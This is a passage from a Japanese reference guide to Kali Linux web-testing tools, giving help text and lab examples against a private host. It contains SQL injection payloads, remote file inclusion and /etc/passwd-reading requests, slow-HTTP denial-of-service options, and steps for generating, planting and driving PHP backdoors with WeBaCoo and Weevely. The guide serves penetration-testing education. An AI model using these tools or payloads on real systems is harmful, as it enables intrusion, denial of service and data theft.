-f max_fail - max number of consecutive HTTP errors (100)
-t req_tmout - total request response timeout (20 s)
-w rw_tmout - individual network I/O timeout (10 s)
-i idle_tmout - timeout on idle HTTP connections (10 s)
-s s_limit - response size limit (400000 B)
-e - do not keep binary responses for reporting
Other settings:
-l max_req - max requests per second (0.000000)
-k duration - stop scanning after the given duration h:m:s
--config file - load the specified configuration file
■ 使用例
root@kali:~# skipfish -o report -O http://192.168.11.4/
Scan statistics:
Scan time : 0:15:34.501
HTTP requests : 538814 (576.7/s), 1350536 kB in, 236585 kB out (1698.4 kB/s)
Compression : 0 kB in, 0 kB out (0.0% gain)
HTTP faults : 12 net errors, 0 proto errors, 0 retried, 0 drops
TCP handshakes : 5581 total (96.7 req/conn)
TCP faults : 0 failures, 12 timeouts, 0 purged
External links : 12843 skipped
Reqs pending : 1147
Database statistics:
Pivots : 2256 total, 1825 done (80.90%)
In progress : 300 pending, 12 init, 4 attacks, 115 dict
Missing nodes : 616 spotted
Node types : 1 serv, 282 dir, 337 file, 642 pinfo, 751 unkn, 241 par, 2 val
Issues found : 2169 info, 4 warn, 6 low, 472 medium, 2 high impact
Dict size : 1061 words (1061 new), 23 extensions, 256 candidates
Signatures : 77 total
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 2256
[+] Looking for duplicate entries: 2256
[+] Counting unique nodes: 1101
[+] Saving pivot data for third-party tools...
[+] Writing scan description...
[+] Writing crawl tree: 2256
[+] Generating summary views...
[+] Report saved to 'report/index.html' [0x0a541269].
[+] This was a great day for science!
出力されたHTMLレポート(クローリング結果をツリー表示)
出力されたHTMLレポート(検出された問題点の一覧)
リクエストとレスポンスの内容をトレース
SlowHTTPTest
Slow HTTP攻撃をテストします。
■ 使用方法
root@kali:~# slowhttptest -h
Usage: slowhttptest [options ...]
Test modes:
-H slow headers a.k.a. Slowloris (default)
-B slow body a.k.a R-U-Dead-Yet
-R range attack a.k.a Apache killer
-X slow read a.k.a Slow Read
Reporting options:
-g generate statistics with socket state changes (off)
-o file_prefix save statistics output in file.html and file.csv (-g required)
-v level verbosity level 0-4: Fatal, Info, Error, Warning, Debug
General options:
-c connections target number of connections (50)
-i seconds interval between followup data in seconds (10)
-l seconds target test length in seconds (240)
-r rate connections per seconds (50)
-s bytes value of Content-Length header if needed (4096)
-t verb verb to use in request, default to GET for
slow headers and response and to POST for slow body
-u URL absolute URL of target (http://localhost/)
-x bytes max length of each randomized name/value pair of
followup data per tick, e.g. -x 2 generates
X-xx: xx for header or &xx=xx for body, where x
is random character (32)
-f content-type value of Content-type header (application/x-www-form-urlencoded)
-m accept value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)
Probe/Proxy options:
-d host:port all traffic directed through HTTP proxy at host:port (off)
-e host:port probe traffic directed through HTTP proxy at host:port (off)
-p seconds timeout to wait for HTTP response on probe connection,
after which server is considered inaccessible (5)
-j cookies value of Cookie header (ex.: -j "user_id=1001; timeout=9000")
Range attack specific options:
-a start left boundary of range in range header (5)
-b bytes limit for range header right boundary values (2000)
Slow read specific options:
-k num number of times to repeat same request in the connection. Use to
multiply response size if server supports persistent connections (1)
-n seconds interval between read operations from recv buffer in seconds (1)
-w bytes start of the range advertised window size would be picked from (1)
-y bytes end of the range advertised window size would be picked from (512)
-z bytes bytes to slow read from receive buffer with single read() call (5)
■ 使用例
root@kali:~# slowhttptest -u http://192.168.11.4 -R
test type: RANGE
number of connections: 50
URL: http://192.168.11.4/
verb: HEAD
[...]
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Thu Nov 14 07:00:20 2024:
Test ended on 1th second
Exit status: No open connections left
smtp-user-enum
SMTPサービスに対してユーザー名の検索を行います。
■ 使用方法
root@kali:~# smtp-user-enum --help
Usage: smtp-user-enum [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
options are:
-m n Maximum number of processes (default: 5)
-M mode Method to use for username guessing EXPN, VRFY or RCPT (default: VRFY)
-u user Check if user exists on remote system
-f addr MAIL FROM email address. Used only in "RCPT TO" mode (default: user@example.com)
-D dom Domain to append to supplied user list to make email addresses (Default: none)
Use this option when you want to guess valid email addresses instead of just usernames
e.g. "-D example.com" would guess foo@example.com, bar@example.com, etc. Instead of
simply the usernames foo and bar.
-U file File of usernames to check via smtp service
-t host Server host running smtp service
-T file File of hostnames running the smtp service
-p port TCP port on which smtp service runs (default: 25)
-d Debugging output
-w n Wait a maximum of n seconds for reply (default: 5)
-v Verbose
-h This help message
■ 使用例
root@kali:~# ssmtp-user-enum -M VRFY -U users.txt -t 192.168.11.4
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Nov 14 07:48:58 2024 #########
192.168.11.4: test exists
192.168.11.4: guest exists
192.168.11.4: user exists
192.168.11.4: ftp exists
192.168.11.4: mysql exists
192.168.11.4: root exists
######## Scan completed at Thu Nov 14 07:48:58 2024 #########
6 results.
sqlmap
SQLインジェクションの脆弱性チェックを行います。
■ 使用方法
root@kali:~# sqlmap --help
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program\'s version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
■ 使用例
root@kali:~# sqlmap -u "http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1*&Submit=Submit" \
--cookie "PHPSESSID=04d676deca8b0f224210c81f83fd5b61;security=medium" \
--level=5 --risk=3 --dbms=MySQL
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[02:18:09] [INFO] flushing session file
[02:18:09] [INFO] testing connection to the target URL
[02:18:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:18:10] [INFO] testing if the target URL content is stable
[02:18:10] [INFO] target URL content is stable
[02:18:10] [INFO] testing if URI parameter '#1*' is dynamic
[02:18:10] [WARNING] URI parameter '#1*' does not appear to be dynamic
[02:18:10] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[...]
sqlmap identified the following injection point(s) with a total of 250 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 OR NOT 4055=4055&Submit=Submit
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 AND ROW(3056,2488)>(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3056=3056,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM (SELECT 8039 UNION SELECT 9934 UNION SELECT 7414 UNION SELECT 9367)a GROUP BY x)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 AND (SELECT 9720 FROM (SELECT(SLEEP(5)))EQKY)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: http://192.168.11.4/dvwa/vulnerabilities/sqli/?id=1 UNION ALL SELECT CONCAT(0x716a707a71,0x4e56456d565748655149425a6d4758726b7a6763685563446c59595171514b466c71755672694a7a,0x7171626a71),NULL-- -&Submit=Submit
---
WAFW00F
WAF(Webアプリケーションファイアウォール)のフィンガープリントをもとに使用されている製品を推測します。
■ 使用方法
root@kali:~# wafw00f --help
Usage: wafw00f url1 [url2 [url3 ... ]]
Options:
-h, --help show this help message and exit
-v, --verbose Enable verbosity, multiple -v options increase
verbosity
-a, --findall Find all WAFs which match the signatures, do not stop
testing on the first one
-r, --noredirect Do not follow redirections given by 3xx responses
-t TEST, --test=TEST Test for one specific WAF
-o OUTPUT, --output=OUTPUT
Write output to csv, json or text file depending on
file extension. For stdout, specify - as filename.
-f FORMAT, --format=FORMAT
Force output format to csv, json or text.
-i INPUT, --input-file=INPUT
Read targets from a file. Input format can be csv,
json or text. For csv and json, a `url` column name or
element is required.
-l, --list List all WAFs that WAFW00F is able to detect
-p PROXY, --proxy=PROXY
Use an HTTP proxy to perform requests, examples:
http://hostname:8080, socks5://hostname:1080,
http://user:pass@hostname:8080
-V, --version Print out the current version of WafW00f and exit.
-H HEADERS, --headers=HEADERS
Pass custom headers via a text file to overwrite the
default header set.
■ 使用例
root@kali:~# wafw00f https://192.168.11.4
[*] Checking https://192.168.11.4
[+] The site https://192.168.11.4 is behind Wordfence (Defiant) WAF.
[~] Number of requests: 2
Wapiti
Webアプリケーションをスキャンして脆弱性をチェックします。
■ 使用方法
root@kali:~# wapiti --help
usage: wapiti [-h] [-u URL] [--scope {page,folder,domain,url,punk}] [-m MODULES_LIST] [--list-modules] [--update] [-l LEVEL] [-p PROXY_URL]
[--tor] [-a CREDENTIALS] [--auth-type {basic,digest,kerberos,ntlm,post}] [-c COOKIE_FILE] [--skip-crawl] [--resume-crawl]
[--flush-attacks] [--flush-session] [--store-session PATH] [--store-config PATH] [-s URL] [-x URL] [-r PARAMETER]
[--skip PARAMETER] [-d DEPTH] [--max-links-per-page MAX] [--max-files-per-dir MAX] [--max-scan-time SECONDS]
[--max-attack-time SECONDS] [--max-parameters MAX] [-S FORCE] [-t SECONDS] [-H HEADER] [-A AGENT] [--verify-ssl {0,1}] [--color]
[-v LEVEL] [-f FORMAT] [-o OUPUT_PATH] [--external-endpoint EXTERNAL_ENDPOINT_URL] [--internal-endpoint INTERNAL_ENDPOINT_URL]
[--endpoint ENDPOINT_URL] [--no-bugreport] [--version]
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL used to define the scan scope (default scope is folder)
--scope {page,folder,domain,url,punk}
Set scan scope
-m MODULES_LIST, --module MODULES_LIST
List of modules to load
--list-modules List Wapiti attack modules and exit
--update Update Wapiti attack modules and exit
-l LEVEL, --level LEVEL
Set attack level
-p PROXY_URL, --proxy PROXY_URL
Set the HTTP(S) proxy to use. Supported: http(s) and socks proxies
--tor Use Tor listener (127.0.0.1:9050)
-a CREDENTIALS, --auth-cred CREDENTIALS
Set HTTP authentication credentials
--auth-type {basic,digest,kerberos,ntlm,post}
Set the authentication type to use
-c COOKIE_FILE, --cookie COOKIE_FILE
Set a JSON cookie file to use
--skip-crawl Don\'t resume the scanning process, attack URLs scanned during a previous session
--resume-crawl Resume the scanning process (if stopped) even if some attacks were previously performed
--flush-attacks Flush attack history and vulnerabilities for the current session
--flush-session Flush everything that was previously found for this target (crawled URLs, vulns, etc)
--store-session PATH Directory where to store attack history and session data.
--store-config PATH Directory where to store configuration databases.
-s URL, --start URL Adds an url to start scan with
-x URL, --exclude URL
Adds an url to exclude from the scan
-r PARAMETER, --remove PARAMETER
Remove this parameter from urls
--skip PARAMETER Skip attacking given parameter(s)
-d DEPTH, --depth DEPTH
Set how deep the scanner should explore the website
--max-links-per-page MAX
Set how many (in-scope) links the scanner should extract for each page
--max-files-per-dir MAX
Set how many pages the scanner should explore per directory
--max-scan-time SECONDS
Set how many seconds you want the scan to last (floats accepted)
--max-attack-time SECONDS
Set how many seconds you want each attack module to last (floats accepted)
--max-parameters MAX URLs and forms having more than MAX input parameters will be erased before attack.
-S FORCE, --scan-force FORCE
Easy way to reduce the number of scanned and attacked URLs. Possible values: paranoid, sneaky, polite, normal,
aggressive, insane
-t SECONDS, --timeout SECONDS
Set timeout for requests
-H HEADER, --header HEADER
Set a custom header to use for every requests
-A AGENT, --user-agent AGENT
Set a custom user-agent to use for every requests
--verify-ssl {0,1} Set SSL check (default is no check)
--color Colorize output
-v LEVEL, --verbose LEVEL
Set verbosity level (0: quiet, 1: normal, 2: verbose)
-f FORMAT, --format FORMAT
Set output format. Supported: json, html (default), txt, xml
-o OUPUT_PATH, --output OUPUT_PATH
Output file or folder
--external-endpoint EXTERNAL_ENDPOINT_URL
Url serving as endpoint for target
--internal-endpoint INTERNAL_ENDPOINT_URL
Url serving as endpoint for attacker
--endpoint ENDPOINT_URL
Url serving as endpoint for both attacker and target
--no-bugreport Don\'t send automatic bug report when an attack module fails
--version Show program\'s version number and exit
■ 使用例
# ログイン認証を行いCookieをJSONファイルに保存
root@kali:~# wapiti-getcookie -u http://192.168.11.4/dvwa/login.php -c cookie.json
Unable to correctly determine your language settings. Using english as default.
Please check your locale settings for internationalization features.
===============================================================
<Cookie PHPSESSID=7bd96fe8ed582842789cc9582969ba0e for 192.168.11.4/>
<Cookie security=high for 192.168.11.4/dvwa>
Choose the form you want to use or enter 'q' to leave :
0) POST http://192.168.11.4/dvwa/login.php (0)
data: username=alice&password=&Login=Login
Enter a number : 0
Please enter values for the following form:
url = http://192.168.11.4/dvwa/login.php
username (alice) : admin
password: password
Login (Login) : Login
<Cookie PHPSESSID=7bd96fe8ed582842789cc9582969ba0e for 192.168.11.4/>
<Cookie security=high for 192.168.11.4/dvwa>
# 保存したCookieを使ってWebアプリケーションをスキャン
root@kali:~# wapiti -u http://192.168.11.4/dvwa/ -c cookie.json --level 2 --exclude http://192.168.11.4/dvwa/logout.php
Note
========
This scan has been saved in the file /root/.wapiti/scans/192.168.11.4_folder_6175d1a4.db
[*] Wapiti found 40 URLs and forms during the scan
[*] Loading modules:
backup, blindsql, brute_login_form, buster, cookieflags, crlf, csp, csrf, exec, file, htaccess, http_headers, methods, nikto, permanentxss, redirect, shellshock, sql, ssrf, wapp, xss, xxe
[*] Launching module csp
CSP is not set
[*] Launching module http_headers
Checking X-Frame-Options :
X-Frame-Options is not set
Checking X-XSS-Protection :
X-XSS-Protection is not set
Checking X-Content-Type-Options :
X-Content-Type-Options is not set
Checking Strict-Transport-Security :
Strict-Transport-Security is not set
[*] Launching module cookieflags
Checking cookie : PHPSESSID
Secure flag is not set in the cookie : PHPSESSID
Checking cookie : security
HttpOnly flag is not set in the cookie : security
Secure flag is not set in the cookie : security
[*] Launching module exec
[*] Launching module file
---
Possible include() vulnerability in http://192.168.11.4/dvwa/vulnerabilities/fi/ via injection in the parameter page
Evil request:
GET /dvwa/vulnerabilities/fi/?page=https%3A%2F%2Fwapiti3.ovh%2Fe.php HTTP/1.1
Host: 192.168.11.4
---
---
Linux local file disclosure vulnerability in http://192.168.11.4/dvwa/vulnerabilities/fi/ via injection in the parameter page
Evil request:
GET /dvwa/vulnerabilities/fi/?page=%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.11.4
---
[...]
Report
------
A report has been generated in the file /root/.wapiti/generated_report
Open /root/.wapiti/generated_report/192.168.11.4_11292024_0326.html with a browser to see this report.
出力されたHTMLレポート
WeBaCoo
PHPバックドアスクリプトの生成および実行を行います。
■ 使用方法
root@kali:~# webacoo -h
Usage: webacoo [options]
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-e CMD Single command execution mode (-t and -u are required)
-m METHOD HTTP method to be used (default is GET)
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-l LOG Log activity to file
-h Display help and exit
update Check for updates and apply if any
■ 使用例
# バックドアスクリプトを作成
root@kali_1:~# webacoo -g -o backdoor.php
[+] Backdoor file "backdoor.php" created.
# 作成したバックドアスクリプトを標的ホストに配置して実行
root@kali_1:~# webacoo -t -u http://192.168.11.4/backdoor.php
[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.
# 標的ホストでコマンドを実行
webacoo$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[...]
Weevely
PHPバックドアスクリプトの生成および実行を行います。
■ 使用方法
root@kali_1:~# man weevely
SYNOPSIS
Run terminal to the target
weevely <URL> <password> [cmd]
Generate backdoor agent
weevely generate <password> <path>
Load session file
weevely session <path>
Modules
Module Description
──────────────────────────────────────────────────────────────────────────
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_disablefunctionby‐ Bypass disable_function restrictions with
pass mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_phpconf Audit PHP configuration.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
:shell_php Execute PHP commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:backdoor_meterpreter Start a meterpreter session.
:bruteforce_sql Bruteforce SQL database.
:file_gzip Compress or expand gzip files.
:file_clearlog Remove string from a file.
:file_check Get attributes and permissions of a file.
:file_upload Upload file to remote filesystem.
:file_webdownload Download an URL.
:file_tar Compress or expand tar archives.
:file_download Download file from remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_edit Edit remote file on a local editor.
:file_grep Print lines matching a pattern in multiple
files.
:file_ls List directory content.
:file_cp Copy single file.
:file_rm Remove remote file.
:file_upload2web Upload file automatically to a web folder
and get corresponding URL.
:file_zip Compress or expand zip files.
:file_touch Change file timestamp.
:file_find Find files with given names and attributes.
:file_mount Mount remote filesystem using HTTPfs.
:file_enum Check existence and permissions of a list
of paths.
:file_read Read remote file from the remote filesys‐
tem.
:file_cd Change current working directory.
:sql_console Execute SQL query or run console.
:sql_dump Multi dbms mysqldump replacement.
:net_mail Send mail.
:net_phpproxy Install PHP proxy on the target.
:net_curl Perform a curl-like HTTP request.
:net_proxy Run local proxy to pivot HTTP/HTTPS brows‐
ing through the target.
:net_scan TCP Port scan.
:net_ifconfig Get network interfaces addresses.
■ 使用例
# バックドアスクリプトを作成
root@kali_1:~# weevely generate hello backdoor.php
Generated 'backdoor.php' with password 'hello' of 692 byte size.
# 作成したバックドアスクリプトを標的ホストに配置して実行
root@kali_1:~# weevely http://192.168.11.4/backdoor.php hello
[+] weevely 4.0.1
[+] Target: 192.168.11.4
[+] Session: /root/.weevely/sessions/192.168.11.4/backdoor_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
# 標的ホストでコマンドを実行
www-data@kali_2:/var/www/html $ :shell_sh cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
[...]
WhatWeb
Webアプリケーションがどのような技術スタックで構成されているのかをスキャンします。
■ 使用方法
root@kali:~# whatweb --help
Usage: whatweb [options] <URLs>
TARGET SELECTION:
<TARGETs> Enter URLs, hostnames, IP addresses, filenames or
IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x
format.
--input-file=FILE, -i Read targets from a file. You can pipe
hostnames or URLs directly with -i /dev/stdin.
TARGET MODIFICATION:
--url-prefix Add a prefix to target URLs.
--url-suffix Add a suffix to target URLs.
--url-pattern Insert the targets into a URL.
e.g. example.com/%insert%/robots.txt
AGGRESSION:
The aggression level controls the trade-off between speed/stealth and
reliability.
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
4. Heavy Makes a lot of HTTP requests per target. URLs
from all plugins are attempted.
HTTP OPTIONS:
--user-agent, -U=AGENT Identify as AGENT instead of WhatWeb/0.5.5.
--header, -H Add an HTTP header. eg "Foo:Bar". Specifying a
default header will replace it. Specifying an
empty value, e.g. "User-Agent:" will remove it.
--follow-redirect=WHEN Control when to follow redirects. WHEN may be
'never', 'http-only', 'meta-only', 'same-site',
or 'always'. Default: always.
--max-redirects=NUM Maximum number of redirects. Default: 10.
AUTHENTICATION:
--user, -u=<user:password> HTTP basic authentication.
--cookie, -c=COOKIES Use cookies, e.g. 'name=value; name2=value2'.
--cookie-jar=FILE Read cookies from a file.
PROXY:
--proxy <hostname[:port]> Set proxy hostname and port.
Default: 8080.
--proxy-user <username:password> Set proxy user and password.
PLUGINS:
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with keywords in a comma
delimited list.
--search-plugins=STRING Search plugins for a keyword.
--plugins, -p=LIST Select plugins. LIST is a comma delimited set
of selected plugins. Default is all.
Each element can be a directory, file or plugin
name and can optionally have a modifier, +/-.
Examples: +/tmp/moo.rb,+/tmp/foo.rb
title,md5,+./plugins-disabled/
./plugins-disabled,-md5
-p + is a shortcut for -p +plugins-disabled.
--grep, -g=STRING|REGEXP Search for STRING or a Regular Expression. Shows
only the results that match.
Examples: --grep "hello"
--grep "/he[l]*o/"
--custom-plugin=DEFINITION Define a custom plugin named Custom-Plugin,
Examples: ":text=>'powered by abc'"
":version=>/powered[ ]?by ab[0-9]/"
":ghdb=>'intitle:abc \"powered by abc\"'"
":md5=>'8666257030b94d3bdb46e05945f60b42'"
"{:text=>'powered by abc'}"
--dorks=PLUGIN List Google dorks for the selected plugin.
OUTPUT:
--verbose, -v Verbose output includes plugin descriptions.
Use twice for debugging.
--colour,--color=WHEN control whether colour is used. WHEN may be
'never', 'always', or 'auto'.
--quiet, -q Do not display brief logging to STDOUT.
--no-errors Suppress error messages.
LOGGING:
--log-brief=FILE Log brief, one-line output.
--log-verbose=FILE Log verbose output.
--log-errors=FILE Log errors.
--log-xml=FILE Log XML format.
--log-json=FILE Log JSON format.
--log-sql=FILE Log SQL INSERT statements.
--log-sql-create=FILE Create SQL database tables.
--log-json-verbose=FILE Log JSON Verbose format.
--log-magictree=FILE Log MagicTree XML format.
--log-object=FILE Log Ruby object inspection format.
--log-mongo-database Name of the MongoDB database.
--log-mongo-collection Name of the MongoDB collection.
Default: whatweb.
--log-mongo-host MongoDB hostname or IP address.
Default: 0.0.0.0.
--log-mongo-username MongoDB username. Default: nil.
--log-mongo-password MongoDB password. Default: nil.
--log-elastic-index Name of the index to store results. Default: whatweb
--log-elastic-host Host:port of the elastic http interface. Default: 127.0.0.1:9200
PERFORMANCE & STABILITY:
--max-threads, -t Number of simultaneous threads. Default: 25.
--open-timeout Time in seconds. Default: 15.
--read-timeout Time in seconds. Default: 30.
--wait=SECONDS Wait SECONDS between connections.
This is useful when using a single thread.
HELP & MISCELLANEOUS:
--short-help Short usage help.
--help, -h Complete usage help.
--debug Raise errors in plugins.
--version Display version information.
■ 使用例
root@kali:~# whatweb http://192.168.11.4
http://192.168.11.4 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[192.168.11.4], JQuery, MetaGenerator[WordPress 5.2.21], PHP[7.2.34], Script[text/javascript], Title[Hello World], UncommonHeaders[link], WordPress[5.2.21], X-Powered-By[PHP/7.2.34], x-pingback[http://192.168.11.4/wp/xmlrpc.php]
WPScan
WordPressで作成されたサイトのセキュリティスキャンを行います。
■ 使用方法
root@kali:~# wpscan --help
Usage: wpscan [options]
--url URL The URL of the blog to scan
Allowed Protocols: http, https
Default Protocol if none provided: http
This option is mandatory unless update or help or hh or version is/are supplied
-h, --help Display the simple help and exit
--hh Display the full help and exit
--version Display the version and exit
-v, --verbose Verbose mode
--[no-]banner Whether or not to display the banner
Default: true
-o, --output FILE Output to FILE
-f, --format FORMAT Output results in the format supplied
Available choices: json, cli-no-colour, cli-no-color, cli
--detection-mode MODE Default: mixed
Available choices: mixed, passive, aggressive
--user-agent, --ua VALUE
--random-user-agent, --rua Use a random user-agent for each scan
--http-auth login:password
-t, --max-threads VALUE The max threads to use
Default: 5
--throttle MilliSeconds Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
--request-timeout SECONDS The request timeout in seconds
Default: 60
--connect-timeout SECONDS The connection timeout in seconds
Default: 30
--disable-tls-checks Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)
--proxy protocol://IP:port Supported protocols depend on the cURL installed
--proxy-auth login:password
--cookie-string COOKIE Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
--cookie-jar FILE-PATH File to read and write cookies
Default: /tmp/wpscan/cookie_jar.txt
--force Do not check if the target is running WordPress or returns a 403
--[no-]update Whether or not to update the Database
--api-token TOKEN The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile
--wp-content-dir DIR The wp-content directory if custom or not detected, such as "wp-content"
--wp-plugins-dir DIR The plugins directory if custom or not detected, such as "wp-content/plugins"
-e, --enumerate [OPTS] Enumeration Process
Available Choices:
vp Vulnerable plugins
ap All plugins
p Popular plugins
vt Vulnerable themes
at All themes
t Popular themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5
Range separator to use: '-'
Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15
Note: Permalink setting must be set to "Plain" for those to be detected
Range separator to use: '-'
Value if no argument supplied: 1-100
Separator to use between the values: ','
Default: All Plugins, Config Backups
Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
Incompatible choices (only one of each group/s can be used):
- vp, ap, p
- vt, at, t
--exclude-content-based REGEXP_OR_STRING Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
Both the headers and body are checked. Regexp delimiters are not required.
--plugins-detection MODE Use the supplied mode to enumerate Plugins.
Default: passive
Available choices: mixed, passive, aggressive
--plugins-version-detection MODE Use the supplied mode to check plugins\' versions.
Default: mixed
Available choices: mixed, passive, aggressive
--exclude-usernames REGEXP_OR_STRING Exclude usernames matching the Regexp/string (case insensitive). Regexp delimiters are not required.
-P, --passwords FILE-PATH List of passwords to use during the password attack.
If no --username/s option supplied, user enumeration will be run.
-U, --usernames LIST List of usernames to use during the password attack.
Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
--multicall-max-passwords MAX_PWD Maximum number of passwords to send by request with XMLRPC multicall
Default: 500
--password-attack ATTACK Force the supplied attack to be used rather than automatically determining one.
Multicall will only work against WP < 4.4
Available choices: wp-login, xmlrpc, xmlrpc-multicall
--login-uri URI The URI of the login page if different from /wp-login.php
--stealthy Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive
■ 使用例
root@kali:~# wpscan --url http://192.168.11.4
[+] URL: http://192.168.11.4/ [192.168.11.4]
[+] Started: Sun Dec 1 09:32:26 2024
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.53 (Debian)
| - X-Powered-By: PHP/7.4.28
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.11.4/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
